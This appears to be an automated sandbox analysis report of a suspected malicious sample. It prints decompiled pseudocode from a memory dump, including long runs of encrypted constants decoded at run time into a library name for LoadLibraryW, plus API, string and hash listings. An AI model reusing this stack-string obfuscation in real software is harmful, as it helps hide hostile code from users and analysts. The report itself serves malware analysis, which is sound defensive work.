				 *((intOrPtr*)(_t284 - 0x294)) = 0x591d935f;
				 *((intOrPtr*)(_t284 - 0x290)) = 0x4b44cf8;
				 *((intOrPtr*)(_t284 - 0x28c)) = 0x87631a53;
				 *((intOrPtr*)(_t284 - 0x288)) = 0x28518c37;
				 *((intOrPtr*)(_t284 - 0x284)) = 0xe1b72a74;
				 *((intOrPtr*)(_t284 - 0x280)) = 0xd1cb6f5c;
				 *((intOrPtr*)(_t284 - 0x27c)) = 0xf48436d8;
				 *((intOrPtr*)(_t284 - 0x278)) = 0x81307b06;
				 *((intOrPtr*)(_t284 - 0x274)) = 0xe03d9e96;
				 *((intOrPtr*)(_t284 - 0x270)) = 0x5b40c1bf;
				 *((intOrPtr*)(_t284 - 0x26c)) = 0x683da5f7;
				 *((intOrPtr*)(_t284 - 0x268)) = 0xc5dacac8;
				 *((intOrPtr*)(_t284 - 0x264)) = 0xe7e5f0f1;
				 *((intOrPtr*)(_t284 - 0x260)) = 0xb332d9fa;
				 *((intOrPtr*)(_t284 - 0x25c)) = 0x6870953f;
				 *((intOrPtr*)(_t284 - 0x258)) = 0x783f7efa;
				 *((intOrPtr*)(_t284 - 0x254)) = 0xae4fa740;
				 *((intOrPtr*)(_t284 - 0x250)) = 0x7f79a4ac;
				 *((intOrPtr*)(_t284 - 0x24c)) = 0xdc5b77cf;
				 *((intOrPtr*)(_t284 - 0x248)) = 0x25da523d;
				 *((intOrPtr*)(_t284 - 0x244)) = 0xe0d312fe;
				 *((intOrPtr*)(_t284 - 0x240)) = 0xd2dff747;
				 *((intOrPtr*)(_t284 - 0x23c)) = 0x7022095;
				 *((intOrPtr*)(_t284 - 0x238)) = 0x719a7b0b;
				 *((intOrPtr*)(_t284 - 0x234)) = 0x7970fd46;
				 *((intOrPtr*)(_t284 - 0x230)) = 0x15b2d04a;
				 *((intOrPtr*)(_t284 - 0x22c)) = 0xcc3b50c3;
				 *((intOrPtr*)(_t284 - 0x228)) = 0x5d96658a;
				 *((intOrPtr*)(_t284 - 0x224)) = 0x5091a0a8;
				 *((intOrPtr*)(_t284 - 0x220)) = 0xab518f9;
				 *((intOrPtr*)(_t284 - 0x21c)) = 0x4f751827;
				 *((intOrPtr*)(_t284 - 0x218)) = 0x947dd9aa;
				 *((intOrPtr*)(_t284 - 0x214)) = 0xbfbbb83e;
				 *((intOrPtr*)(_t284 - 0x210)) = 0x3b76d3f;
				 *((intOrPtr*)(_t284 - 0x20c)) = 0xf9878d9d;
				 *((intOrPtr*)(_t284 - 0x208)) = 0xf8ea9dae;
				 *((intOrPtr*)(_t284 - 0x204)) = 0x6133bef0;
				 *((intOrPtr*)(_t284 - 0x200)) = 0x76e6f97b;
				 *((intOrPtr*)(_t284 - 0x1fc)) = 0x5e025c72;
				 *((intOrPtr*)(_t284 - 0x1f8)) = 0x4752fe5;
				 *((intOrPtr*)(_t284 - 0x1f4)) = 0xfdcd733f;
				 *((intOrPtr*)(_t284 - 0x1f0)) = 0xcbbf6b7e;
				 *((intOrPtr*)(_t284 - 0x1ec)) = 0xf32a2264;
				 *((intOrPtr*)(_t284 - 0x1e8)) = 0xbec1ac14;
				 *((intOrPtr*)(_t284 - 0x1e4)) = 0x9f1483c4;
				 *((intOrPtr*)(_t284 - 0x1e0)) = 0x92065933;
				 *((intOrPtr*)(_t284 - 0x1dc)) = 0x51ff9fa1;
				 *((intOrPtr*)(_t284 - 0x1d8)) = 0x625a13b4;
				 *((intOrPtr*)(_t284 - 0x1d4)) = 0x2ded854;
				 *((intOrPtr*)(_t284 - 0x1d0)) = 0xb6117717;
				 *((intOrPtr*)(_t284 - 0x1cc)) = 0x91e781f9;
				 *((intOrPtr*)(_t284 - 0x1c8)) = 0xcd6f92f7;
				 *((intOrPtr*)(_t284 - 0x1c4)) = 0x87a2363d;
				 *((intOrPtr*)(_t284 - 0x1c0)) = 0x13b8268e;
				 *((intOrPtr*)(_t284 - 0x1bc)) = 0x2580013;
				 *((intOrPtr*)(_t284 - 0x1b8)) = 0x5ecdb453;
				 *((intOrPtr*)(_t284 - 0x1b4)) = 0x34b5737;
				 *((intOrPtr*)(_t284 - 0x1b0)) = 0xab27928e;
				 *((intOrPtr*)(_t284 - 0x1ac)) = 0x332b8ed3;
				 *((intOrPtr*)(_t284 - 0x1a8)) = 0x7f922841;
				 *((intOrPtr*)(_t284 - 0x1a4)) = 0x7e650469;
				 *((intOrPtr*)(_t284 - 0x1a0)) = 0xd5cf8ddc;
				 *((intOrPtr*)(_t284 - 0x19c)) = 0xf2a7d7c;
				 *((intOrPtr*)(_t284 - 0x198)) = 0x139aa2bd;
				 *((intOrPtr*)(_t284 - 0x194)) = 0x180a5291;
				 *((intOrPtr*)(_t284 - 0x190)) = 0xab8c0cb8;
				 *((intOrPtr*)(_t284 - 0x18c)) = 0xea542bff;
				 *((intOrPtr*)(_t284 - 0x188)) = 0xc0c12a40;
				 *((intOrPtr*)(_t284 - 0x184)) = 0xb850ac98;
				 *((intOrPtr*)(_t284 - 0x180)) = 0x1bf805ad;
				 *((intOrPtr*)(_t284 - 0x17c)) = 0x7907e523;
				 *((intOrPtr*)(_t284 - 0x178)) = 0xe8c03c27;
				 *((intOrPtr*)(_t284 - 0x174)) = 0x85cd6441;
				 *((intOrPtr*)(_t284 - 0x170)) = 0xc7d5e05c;
				 *((intOrPtr*)(_t284 - 0x16c)) = 0xc3189a81;
				 *((intOrPtr*)(_t284 - 0x168)) = 0x479f2e5f;
				 *((intOrPtr*)(_t284 - 0x164)) = 0x6c3275b5;
				 *((intOrPtr*)(_t284 - 0x160)) = 0x965b94c0;
				 *((intOrPtr*)(_t284 - 0x15c)) = 0x79db8e5e;
				 *((intOrPtr*)(_t284 - 0x158)) = 0x9963eb1a;
				 *((intOrPtr*)(_t284 - 0x154)) = 0x566b7606;
				 *((intOrPtr*)(_t284 - 0x150)) = 0x34268710;
				 *((intOrPtr*)(_t284 - 0x14c)) = 0xb16c33fb;
				 *((intOrPtr*)(_t284 - 0x148)) = 0xa9e70d08;
				 *((intOrPtr*)(_t284 - 0x144)) = 0xa4f0ba81;
				 *((intOrPtr*)(_t284 - 0x140)) = 0x5dbef4f;
				 *((intOrPtr*)(_t284 - 0x13c)) = 0x186f7a9e;
				 *((intOrPtr*)(_t284 - 0x138)) = 0x6189fd9a;
				 *((intOrPtr*)(_t284 - 0x134)) = 0x88407b08;
				 *((intOrPtr*)(_t284 - 0x130)) = 0x3153193f;
				 *((intOrPtr*)(_t284 - 0x12c)) = 0x67230cd3;
				 *((intOrPtr*)(_t284 - 0x128)) = 0x5fd0a1fe;
				 *((intOrPtr*)(_t284 - 0x124)) = 0x356453bb;
				 *((intOrPtr*)(_t284 - 0x120)) = 0x7c6cf28b;
				 *((intOrPtr*)(_t284 - 0x11c)) = 0xca12322b;
				 *((intOrPtr*)(_t284 - 0x118)) = 0x3ffcc3c2;
				 *((intOrPtr*)(_t284 - 0x114)) = 0x442ea63e;
				 *((intOrPtr*)(_t284 - 0x110)) = 0xef0f8a02;
				 *((intOrPtr*)(_t284 - 0x10c)) = 0xa1aadcfb;
				 *((intOrPtr*)(_t284 - 0x108)) = 0x97db4dc8;
				 *((intOrPtr*)(_t284 - 0x104)) = 0xb5745228;
				 *((intOrPtr*)(_t284 - 0x100)) = 0x92edbdaf;
				 *((intOrPtr*)(_t284 - 0xfc)) = 0x3d612b8;
				 *((intOrPtr*)(_t284 - 0xf8)) = 0x2acb5d86;
				 *((intOrPtr*)(_t284 - 0xf4)) = 0xb378ebbf;
				 *((intOrPtr*)(_t284 - 0xf0)) = 0x888f56a5;
				 *((intOrPtr*)(_t284 - 0xec)) = 0xb44281f4;
				 *((intOrPtr*)(_t284 - 0xe8)) = 0x1e5aefa2;
				 *((intOrPtr*)(_t284 - 0xe4)) = 0xe64825e9;
				 *((intOrPtr*)(_t284 - 0xe0)) = 0x8648df89;
				 *((intOrPtr*)(_t284 - 0xdc)) = 0x115ea883;
				 *((intOrPtr*)(_t284 - 0xd8)) = 0x3af74aa7;
				 *((intOrPtr*)(_t284 - 0xd4)) = 0x202a9a87;
				 *((intOrPtr*)(_t284 - 0xd0)) = 0xbf893e19;
				 *((intOrPtr*)(_t284 - 0xcc)) = 0x69d7038c;
				 *((intOrPtr*)(_t284 - 0xc8)) = 0x7c71740b;
				 *((intOrPtr*)(_t284 - 0xc4)) = 0xc7ccad21;
				 *((intOrPtr*)(_t284 - 0xc0)) = 0xee01f4da;
				 *((intOrPtr*)(_t284 - 0xbc)) = 0x68406b5e;
				 *((intOrPtr*)(_t284 - 0xb8)) = 0x93566171;
				 *((intOrPtr*)(_t284 - 0xb4)) = 0xbc3b2234;
				 *((intOrPtr*)(_t284 - 0xb0)) = 0x6f738a8f;
				 *((intOrPtr*)(_t284 - 0xac)) = 0x924d71cd;
				 *((intOrPtr*)(_t284 - 0xa8)) = 0xccae1042;
				 *((intOrPtr*)(_t284 - 0xa4)) = 0x6b902c01;
				 *((intOrPtr*)(_t284 - 0xa0)) = 0xdaaf197b;
				 *((intOrPtr*)(_t284 - 0x9c)) = 0x5e5aebef;
				 *((intOrPtr*)(_t284 - 0x98)) = 0x8fb5e58c;
				 *((intOrPtr*)(_t284 - 0x94)) = 0xf5fe6f7e;
				 *((intOrPtr*)(_t284 - 0x90)) = 0xc7957f25;
				 *((intOrPtr*)(_t284 - 0x8c)) = 0x7c49cf4e;
				 *((intOrPtr*)(_t284 - 0x88)) = 0x6a7edd29;
				 *((intOrPtr*)(_t284 - 0x84)) = 0x30389426;
				 *((intOrPtr*)(_t284 - 0x80)) = 0xb39b1eb;
				 *((intOrPtr*)(_t284 - 0x7c)) = 0x32da1600;
				 *((intOrPtr*)(_t284 - 0x78)) = 0xdc7fb1ae;
				 *((intOrPtr*)(_t284 - 0x74)) = 0x2337eb3c;
				 *((intOrPtr*)(_t284 - 0x70)) = 0xafd2921b;
				 *((intOrPtr*)(_t284 - 0x6c)) = 0x51dd5891;
				 *((intOrPtr*)(_t284 - 0x68)) = 0xacc11b49;
				 *((intOrPtr*)(_t284 - 0x64)) = 0x23a45974;
				 *((intOrPtr*)(_t284 - 0x60)) = 0x832c3c3f;
				 *((intOrPtr*)(_t284 - 0x5c)) = 0x562f46e;
				 *((intOrPtr*)(_t284 - 0x58)) = 0xba5bcd86;
				 *((intOrPtr*)(_t284 - 0x54)) = 0x7359cfcf;
				 *((intOrPtr*)(_t284 - 0x50)) = 0xcabec7c;
				 *((intOrPtr*)(_t284 - 0x4c)) = 0x9697f9c0;
				 *((intOrPtr*)(_t284 - 0x48)) = 0x35db867b;
				 *((intOrPtr*)(_t284 - 0x44)) = 0xa97d7963;
				 *((intOrPtr*)(_t284 - 0x40)) = 0x147bfba5;
				 *((intOrPtr*)(_t284 - 0x3c)) = 0x2596c387;
				 *((intOrPtr*)(_t284 - 0x38)) = 0x7ee5d084;
				 *((intOrPtr*)(_t284 - 0x34)) = 0x8c122eb4;
				 *((intOrPtr*)(_t284 - 0x30)) = 0x5766d9df;
				 *((intOrPtr*)(_t284 - 0x2c)) = 0x4d281f85;
				 *((intOrPtr*)(_t284 - 0x28)) = 0x2062f8bf;
				 *((intOrPtr*)(_t284 - 0x24)) = 0xfb193eb3;
				 *((intOrPtr*)(_t284 - 0x20)) = 0x64e2007f;
				 *((intOrPtr*)(_t284 - 0x1c)) = 0x377c16ec;
				 *((intOrPtr*)(_t284 - 0x18)) = 0x98aeaae7;
				 *((intOrPtr*)(_t284 - 0x14)) = 0xcfe1fba1;
				 *((intOrPtr*)(_t284 - 0x10)) = 0xd5013e25;
				 *((intOrPtr*)(_t284 - 0xc)) = 0x145b8804;
				 *((intOrPtr*)(_t284 - 8)) = 0xdc6b19a2;
				 *((intOrPtr*)(_t284 - 4)) = 0xd0c5ad00;
				_t282 = L00111D00(0x1231f0, 0x1a0, _t280);
				 *0x127c84 = LoadLibraryW(_t282);
				_t273 = HeapFree(GetProcessHeap(), 0, _t282);
				_t277 =  *0x127c84; // 0x771d0000
				_t283 = 0x1f5c6a;
				if(_t277 != 0) {
					goto 0x3117a4;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00111480(_t275, _t277, _t284 - 0x430, _t280, _t283);
				} else {
					goto 0x311791;
					return _t273;
				}
			}

0x00118b2a
0x00118b34
0x00118b3e
0x00118b48
0x00118b52
0x00118b5c
0x00118b66
0x00118b70
0x00118b7a
0x00118b84
0x00118b8e
0x00118b98
0x00118ba2
0x00118bac
0x00118bb6
0x00118bc0
0x00118bca
0x00118bd4
0x00118bde
0x00118be8
0x00118bf2
0x00118bfc
0x00118c06
0x00118c10
0x00118c1a
0x00118c24
0x00118c2e
0x00118c38
0x00118c42
0x00118c4c
0x00118c56
0x00118c60
0x00118c6a
0x00118c74
0x00118c7e
0x00118c88
0x00118c92
0x00118c9c
0x00118ca6
0x00118cb0
0x00118cba
0x00118cc4
0x00118cce
0x00118cd8
0x00118ce2
0x00118cec
0x00118cf6
0x00118d00
0x00118d0a
0x00118d14
0x00118d1e
0x00118d28
0x00118d32
0x00118d3c
0x00118d46
0x00118d50
0x00118d5a
0x00118d64
0x00118d6e
0x00118d78
0x00118d82
0x00118d8c
0x00118d96
0x00118da0
0x00118daa
0x00118db4
0x00118dbe
0x00118dc8
0x00118dd2
0x00118ddc
0x00118de6
0x00118df0
0x00118dfa
0x00118e04
0x00118e0e
0x00118e18
0x00118e22
0x00118e2c
0x00118e36
0x00118e40
0x00118e4a
0x00118e54
0x00118e5e
0x00118e68
0x00118e72
0x00118e7c
0x00118e86
0x00118e90
0x00118e9a
0x00118ea4
0x00118eae
0x00118eb8
0x00118ec2
0x00118ecc
0x00118ed6
0x00118ee0
0x00118eea
0x00118ef4
0x00118efe
0x00118f08
0x00118f12
0x00118f1c
0x00118f26
0x00118f30
0x00118f3a
0x00118f44
0x00118f4e
0x00118f58
0x00118f62
0x00118f6c
0x00118f76
0x00118f80
0x00118f8a
0x00118f94
0x00118f9e
0x00118fa8
0x00118fb2
0x00118fbc
0x00118fc6
0x00118fd0
0x00118fda
0x00118fe4
0x00118fee
0x00118ff8
0x00119002
0x0011900c
0x00119016
0x00119020
0x0011902a
0x00119034
0x0011903e
0x00119048
0x00119052
0x0011905c
0x00119066
0x00119070
0x0011907a
0x00119084
0x0011908e
0x00119098
0x001190a2
0x001190ac
0x001190b6
0x001190c0
0x001190ca
0x001190d4
0x001190de
0x001190e8
0x001190f2
0x001190fc
0x00119106
0x00119110
0x0011911a
0x00119124
0x0011912e
0x00119138
0x00119142
0x0011914c
0x00119156
0x00119160
0x0011916a
0x00119174
0x0011917e
0x00119188
0x00119192
0x0011919c
0x001191a6
0x001191b0
0x001191ba
0x001191c4
0x001191ce
0x001191d8
0x001191e2
0x001191ec
0x001191f6
0x00119200
0x0011920a
0x00119214
0x0011921e
0x00119228
0x00119232
0x0011923c
0x00119246
0x00119250
0x0011925a
0x00119264
0x0011926e
0x00119278
0x00119282
0x0011928c
0x00119296
0x001192a0
0x001192aa
0x001192b4
0x001192be
0x001192c8
0x001192d2
0x001192dc
0x001192e6
0x001192f0
0x001192fa
0x00119304
0x0011930e
0x00119318
0x00119322
0x0011932c
0x00119336
0x00119340
0x0011934a
0x00119354
0x0011935e
0x00119368
0x00119372
0x0011937c
0x00119386
0x00119390
0x0011939a
0x001193a4
0x001193ae
0x001193b8
0x001193c2
0x001193cc
0x001193d6
0x001193e0
0x001193ea
0x001193f4
0x001193fe
0x00119408
0x00119412
0x0011941c
0x00119426
0x00119430
0x0011943a
0x00119444
0x0011944e
0x00119458
0x00119462
0x00119469
0x00119470
0x00119477
0x0011947e
0x00119485
0x00119496
0x001194a2
0x001194a9
0x001194b0
0x001194b7
0x001194be
0x001194c5
0x001194cc
0x001194d3
0x001194da
0x001194e1
0x001194e8
0x001194ef
0x001194f6
0x001194fd
0x00119504
0x0011950b
0x00119512
0x00119519
0x00119520
0x00119527
0x0011952e
0x00119535
0x0011953c
0x00119543
0x0011954a
0x00119559
0x00119565
0x00119571
0x00119577
0x0011957d
0x00119580
0x00119588
0x0011958d
0x0011958e
0x0011958f
0x00119590
0x00119591
0x00119592
0x00119593
0x00119594
0x00119595
0x00119596
0x001195a8
0x00119582
0x00119582
0x00119587
0x00119587

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0011955C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011956A
HeapFree.KERNEL32(00000000), ref: 00119571

Strings

<0DR, xrefs: 00118DFA
[!N, xrefs: 00118B3E
M`pO, xrefs: 00118CEC
k0, xrefs: 00118C7E
^k@h, xrefs: 001193CC
%H, xrefs: 00119368
Z, xrefs: 00118C9C
s%, xrefs: 00118DF0
<7#, xrefs: 00119477
Z^, xrefs: 0011941C

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: k0$<0DR$<7#$M`pO$Z$^k@h$%H$[!N$s%$Z^
API String ID: 872250060-2301064221
Opcode ID: 8755ca2163d6f26e8c42d7687324d9d410420ec1f859a2e31b6335d6ca2425fb
Instruction ID: 15e90be691dd590a7f5344a1004aef58f284df16f35878e08db0f525dec1381b
Opcode Fuzzy Hash: 8755ca2163d6f26e8c42d7687324d9d410420ec1f859a2e31b6335d6ca2425fb
Instruction Fuzzy Hash: 7A22B6B48163A9CBDB62DF829A897CDBA74FB11344F6086C8D1593B214CB750BC2CF85

Uniqueness

Uniqueness Score: 100.00%

Function 001124B6, Relevance: 15.1, APIs: 10, Instructions: 102
memorystringCOMMON

C-Code - Quality: 36%

			E001124B6(int __ecx) {
				long* _t25;
				short* _t29;
				void* _t30;
				int _t46;
				int _t48;
				void* _t50;
				void* _t51;
				long* _t55;
				int _t59;
				signed int _t61;
				void* _t63;
				void* _t65;
				long _t66;
				WCHAR* _t68;
				void* _t69;

				 *(_t69 - 8) = 0;
				_t48 = 0;
				 *(_t69 - 0xc) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0;
				_t25 = __ecx + 4;
				_t59 = 0;
				 *(_t69 - 0x10) = _t25;
				 *_t25 = 0;
				L00111BE0(0x112410, _t69 - 8);
				_t63 =  *(_t69 - 8);
				while(_t63 != 0) {
					_t6 = _t63 + 4; // 0x4
					_t46 = lstrlenW(_t6);
					_t63 =  *_t63;
					_t48 = _t48 + 1 + _t46;
				}
				_t29 = RtlAllocateHeap(GetProcessHeap(), 8, _t48 + _t48);
				 *(_t69 - 4) = _t29;
				if(_t29 == 0) {
					_t59 =  *(_t69 - 0xc);
				} else {
					_t50 =  *(_t69 - 8);
					while(_t50 != 0) {
						_t10 = _t50 + 4; // 0x4
						_t68 = _t10;
						lstrcpyW( &(_t29[_t59]), _t68);
						_t61 = _t59 + lstrlenW(_t68);
						_t29 =  *(_t69 - 4);
						_t29[_t61] = 0x2c;
						_t59 = _t61 + 1;
						_t50 =  *_t50;
					}
					_t51 = 0;
					_t66 = WideCharToMultiByte(0xfde9, 0, _t29, _t59, 0, 0, 0, 0);
					 *(_t69 - 0x14) = _t66;
					if(_t66 != 0) {
						_t51 = RtlAllocateHeap(GetProcessHeap(), 8, _t66);
						if(_t51 == 0) {
							goto L11;
						} else {
							goto 0x310916;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							WideCharToMultiByte();
							_t55 =  *(_t69 - 0x10);
							if(_t55 != 0) {
								 *_t55 =  *(_t69 - 0x14);
							}
						}
					}
					goto 0x310936;
					asm("int3");
					 *_t59 = _t51;
					HeapFree(GetProcessHeap(), ??, ??);
				}
				_t30 =  *(_t69 - 8);
				if(_t30 != 0) {
					do {
						_t65 =  *_t30;
						HeapFree(GetProcessHeap(), 0, _t30);
						_t30 = _t65;
					} while (_t65 != 0);
				}
				return 0 |  *_t59 != 0x00000000;
			}

0x001124b8
0x001124c0
0x001124c2
0x001124c6
0x001124cb
0x001124d4
0x001124d6
0x001124d9
0x001124db
0x001124e0
0x001124e5
0x001124f0
0x001124f4
0x001124fa
0x001124fd
0x001124ff
0x00112510
0x00112516
0x0011251b
0x001125c5
0x00112521
0x00112521
0x00112526
0x00112528
0x00112528
0x00112530
0x0011253d
0x00112544
0x00112547
0x0011254b
0x0011254c
0x0011254e
0x00112552
0x00112566
0x00112568
0x0011256d
0x0011257f
0x00112583
0x00000000
0x00112585
0x00112585
0x0011258a
0x0011258b
0x0011258c
0x0011258d
0x0011258e
0x0011258f
0x00112590
0x00112591
0x00112592
0x00112593
0x00112594
0x00112595
0x00112596
0x00112597
0x0011259d
0x001125a2
0x001125a7
0x001125a7
0x001125a2
0x00112583
0x001125ae
0x001125b3
0x001125b4
0x001125bd
0x001125bd
0x001125c8
0x001125cd
0x001125d0
0x001125d0
0x001125dc
0x001125e2
0x001125e4
0x001125d0
0x001125f5

APIs

lstrlenW.KERNEL32(00000004), ref: 001124F4
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00112509
RtlAllocateHeap.NTDLL(00000000), ref: 00112510
lstrcpyW.KERNEL32(00000000,00000004), ref: 00112530
lstrlenW.KERNEL32(00000004), ref: 00112537
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00112560
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00112572
RtlAllocateHeap.NTDLL(00000000), ref: 00112579
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001125D5
HeapFree.KERNEL32(00000000), ref: 001125DC

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$Process$Allocatelstrlen$ByteCharFreeMultiWidelstrcpy
String ID:
API String ID: 3825671978-0
Opcode ID: 46e1589ccc0b443c5fb577f8a1a1c06c9201607fa0799f133347e8076b3f11de
Instruction ID: 54118dbf31a6e7a3ece7d11714a08890e8f965ac9a8e7928c1e9b33eafffa999
Opcode Fuzzy Hash: 46e1589ccc0b443c5fb577f8a1a1c06c9201607fa0799f133347e8076b3f11de
Instruction Fuzzy Hash: 8531AB72A00314EFDB248FE4DCC8AAEB7BDEF48744B050474E901EB600DB709DA18BA0

Uniqueness

Uniqueness Score: 1.85%

Function 00116BAA, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 167
memorylibraryUNIQUE

C-Code - Quality: 92%

			E00116BAA(void* __esi, void* __eflags) {
				int _t152;
				void* _t154;
				intOrPtr _t156;
				void* _t159;
				void* _t161;
				void* _t162;
				void* _t163;

				 *((intOrPtr*)(_t163 - 0x24c)) = 0x71744fb1;
				 *((intOrPtr*)(_t163 - 0x248)) = 0x45d6f7ed;
				 *((intOrPtr*)(_t163 - 0x244)) = 0x8dff7e89;
				 *((intOrPtr*)(_t163 - 0x240)) = 0x7ffd7be0;
				 *((intOrPtr*)(_t163 - 0x23c)) = 0x9fdeeae2;
				 *((intOrPtr*)(_t163 - 0x238)) = 0x786d5615;
				 *((intOrPtr*)(_t163 - 0x234)) = 0x604ea1f7;
				 *((intOrPtr*)(_t163 - 0x230)) = 0x411f1ad5;
				 *((intOrPtr*)(_t163 - 0x22c)) = 0xa612af75;
				 *((intOrPtr*)(_t163 - 0x228)) = 0x35c83646;
				 *((intOrPtr*)(_t163 - 0x224)) = 0xda68584a;
				 *((intOrPtr*)(_t163 - 0x220)) = 0xf9c4ef99;
				 *((intOrPtr*)(_t163 - 0x21c)) = 0x1ffb17c6;
				 *((intOrPtr*)(_t163 - 0x218)) = 0x2a559a64;
				 *((intOrPtr*)(_t163 - 0x214)) = 0x349ee742;
				 *((intOrPtr*)(_t163 - 0x210)) = 0x4a11520f;
				 *((intOrPtr*)(_t163 - 0x20c)) = 0x1b55063a;
				 *((intOrPtr*)(_t163 - 0x208)) = 0x1fbc74ec;
				 *((intOrPtr*)(_t163 - 0x204)) = 0x8afa589d;
				 *((intOrPtr*)(_t163 - 0x200)) = 0xe126f3ae;
				 *((intOrPtr*)(_t163 - 0x1fc)) = 0x1298effd;
				 *((intOrPtr*)(_t163 - 0x1f8)) = 0x551a0a77;
				 *((intOrPtr*)(_t163 - 0x1f4)) = 0x1eb6f591;
				 *((intOrPtr*)(_t163 - 0x1f0)) = 0xc744f596;
				 *((intOrPtr*)(_t163 - 0x1ec)) = 0x2d03d841;
				 *((intOrPtr*)(_t163 - 0x1e8)) = 0x748f9909;
				 *((intOrPtr*)(_t163 - 0x1e4)) = 0x6f96c2cf;
				 *((intOrPtr*)(_t163 - 0x1e0)) = 0xda278cdd;
				 *((intOrPtr*)(_t163 - 0x1dc)) = 0x4b1980d2;
				 *((intOrPtr*)(_t163 - 0x1d8)) = 0xb6d4c647;
				 *((intOrPtr*)(_t163 - 0x1d4)) = 0x6e4a8f8c;
				 *((intOrPtr*)(_t163 - 0x1d0)) = 0x806b9650;
				 *((intOrPtr*)(_t163 - 0x1cc)) = 0xb1bcf103;
				 *((intOrPtr*)(_t163 - 0x1c8)) = 0x74c5c597;
				 *((intOrPtr*)(_t163 - 0x1c4)) = 0xdfc78e4f;
				 *((intOrPtr*)(_t163 - 0x1c0)) = 0x58f7a652;
				 *((intOrPtr*)(_t163 - 0x1bc)) = 0xb120ea26;
				 *((intOrPtr*)(_t163 - 0x1b8)) = 0xfcfae165;
				 *((intOrPtr*)(_t163 - 0x1b4)) = 0x3808541e;
				 *((intOrPtr*)(_t163 - 0x1b0)) = 0x955dd695;
				 *((intOrPtr*)(_t163 - 0x1ac)) = 0x9ecdac3a;
				 *((intOrPtr*)(_t163 - 0x1a8)) = 0x8ed5f281;
				 *((intOrPtr*)(_t163 - 0x1a4)) = 0x6bdaf004;
				 *((intOrPtr*)(_t163 - 0x1a0)) = 0xb3361c8c;
				 *((intOrPtr*)(_t163 - 0x19c)) = 0x83fe0156;
				 *((intOrPtr*)(_t163 - 0x198)) = 0x60152a13;
				 *((intOrPtr*)(_t163 - 0x194)) = 0x21a109a0;
				 *((intOrPtr*)(_t163 - 0x190)) = 0xae50f5aa;
				 *((intOrPtr*)(_t163 - 0x18c)) = 0xe5d42415;
				 *((intOrPtr*)(_t163 - 0x188)) = 0xff326d0f;
				 *((intOrPtr*)(_t163 - 0x184)) = 0x33dc58fa;
				 *((intOrPtr*)(_t163 - 0x180)) = 0xd788fcbe;
				 *((intOrPtr*)(_t163 - 0x17c)) = 0x52185b40;
				 *((intOrPtr*)(_t163 - 0x178)) = 0x40a35bee;
				 *((intOrPtr*)(_t163 - 0x174)) = 0x2a5f460b;
				 *((intOrPtr*)(_t163 - 0x170)) = 0x32ba9a31;
				 *((intOrPtr*)(_t163 - 0x16c)) = 0xca034b44;
				 *((intOrPtr*)(_t163 - 0x168)) = 0x54132d4f;
				 *((intOrPtr*)(_t163 - 0x164)) = 0x91ae1d70;
				 *((intOrPtr*)(_t163 - 0x160)) = 0x7ac24f93;
				 *((intOrPtr*)(_t163 - 0x15c)) = 0xf37f4232;
				 *((intOrPtr*)(_t163 - 0x158)) = 0xa6615044;
				 *((intOrPtr*)(_t163 - 0x154)) = 0xc47febf8;
				 *((intOrPtr*)(_t163 - 0x150)) = 0xb29e162d;
				 *((intOrPtr*)(_t163 - 0x14c)) = 0x21378b1c;
				 *((intOrPtr*)(_t163 - 0x148)) = 0x78a5ce5c;
				 *((intOrPtr*)(_t163 - 0x144)) = 0x61bc1d21;
				 *((intOrPtr*)(_t163 - 0x140)) = 0xea2ecede;
				 *((intOrPtr*)(_t163 - 0x13c)) = 0xa791dede;
				 *((intOrPtr*)(_t163 - 0x138)) = 0xa7887afd;
				 *((intOrPtr*)(_t163 - 0x134)) = 0xe171ecb5;
				 *((intOrPtr*)(_t163 - 0x130)) = 0xce33962f;
				 *((intOrPtr*)(_t163 - 0x12c)) = 0xb256e05d;
				 *((intOrPtr*)(_t163 - 0x128)) = 0xa0cac220;
				 *((intOrPtr*)(_t163 - 0x124)) = 0xee34e364;
				 *((intOrPtr*)(_t163 - 0x120)) = 0x6e140336;
				 *((intOrPtr*)(_t163 - 0x11c)) = 0x60420845;
				 *((intOrPtr*)(_t163 - 0x118)) = 0x9392cfe6;
				 *((intOrPtr*)(_t163 - 0x114)) = 0x5f5c3139;
				 *((intOrPtr*)(_t163 - 0x110)) = 0x81289ce0;
				 *((intOrPtr*)(_t163 - 0x10c)) = 0x36617698;
				 *((intOrPtr*)(_t163 - 0x108)) = 0x64028be8;
				 *((intOrPtr*)(_t163 - 0x104)) = 0x3b8df82c;
				 *((intOrPtr*)(_t163 - 0x100)) = 0xf98f5a76;
				 *((intOrPtr*)(_t163 - 0xfc)) = 0x7e1fec4c;
				 *((intOrPtr*)(_t163 - 0xf8)) = 0x42677be5;
				 *((intOrPtr*)(_t163 - 0xf4)) = 0xc60b584c;
				 *((intOrPtr*)(_t163 - 0xf0)) = 0x5fcd2f06;
				 *((intOrPtr*)(_t163 - 0xec)) = 0xf8cbcfec;
